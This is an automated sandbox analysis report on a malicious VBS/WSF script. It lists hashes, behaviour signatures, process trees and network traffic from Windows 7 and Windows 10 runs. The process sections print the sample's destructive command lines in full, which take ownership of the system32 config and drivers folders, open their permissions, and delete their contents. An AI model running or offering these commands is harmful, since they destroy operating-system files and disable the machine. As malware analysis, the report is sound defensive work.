Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-1gj16szhjn
Target target.vbs
SHA256 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad

Threat Level: Likely malicious

The file target.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:37

Reported

2024-08-15 21:39

Platform

win7-20240704-en

Max time kernel

121s

Max time network

121s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2512 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2512 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2512 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2264 wrote to memory of 2796 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2796 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2796 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2844 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2844 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2264 wrote to memory of 2844 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2844 wrote to memory of 2564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2844 wrote to memory of 2564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2844 wrote to memory of 2564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2796 wrote to memory of 2608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2796 wrote to memory of 2608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2796 wrote to memory of 2608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2796 wrote to memory of 2744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2796 wrote to memory of 2744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2796 wrote to memory of 2744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2844 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2844 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2844 wrote to memory of 1804 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 6425a144c5de5bc3bcd5865809150a0d
SHA1 257d00e71e71832c90fc494b5121df3a8149560d
SHA256 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
SHA512 95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34

C:\Users\Admin\Desktop\ConvertFromUndo.vbs

MD5 ece02545122cc48c9d8afaf3f94dd04f
SHA1 8e07b6da685faad07f8413230a95ce0ae8987e0d
SHA256 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512 e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:37

Reported

2024-08-15 21:39

Platform

win10v2004-20240802-en

Max time kernel

149s

Max time network

151s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\Notepad.exe N/A
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf thescript.vbs && start thescript.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\target.wsf

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf"

C:\Windows\System32\Notepad.exe

"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\thescript.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\ConfirmResize.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\thescript.vbs

MD5 6425a144c5de5bc3bcd5865809150a0d
SHA1 257d00e71e71832c90fc494b5121df3a8149560d
SHA256 7c2461116f624799741f4983fb1bbb69c7c0024e7b258d8c79208669a75a69ad
SHA512 95dd1168240a1e2011d45d2efe406ef88ee90140c97e9ec585fdd27ce15aa75a1479beae143a6d9717ed29002d818f165a2ad8910bc3b9ccc5d847024a173e34

C:\Users\Admin\Desktop\desktop.vbs

MD5 ece02545122cc48c9d8afaf3f94dd04f
SHA1 8e07b6da685faad07f8413230a95ce0ae8987e0d
SHA256 5098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512 e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5

C:\Users\Admin\Music\SuspendProtect.mp3

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

C:\Users\Admin\AppData\Local\Temp\target.wsf

MD5 7efc82c24c2ce07d6e37f750cc9aa312
SHA1 24641d0653f3b3b850b25319bdae26bf1a46040a
SHA256 78d136408cfd4790b861a67f1a7acb826c7c7e8ee75aa7fa5b60ae6e33216d4f
SHA512 a1a3ee6fa3bfede92806362447b787a29b3ad1e9f64322eec4c8ef38e7a3742eef843373da1461512bc7ee83953344ff67fff2c46eb57fc2feca9e632847edde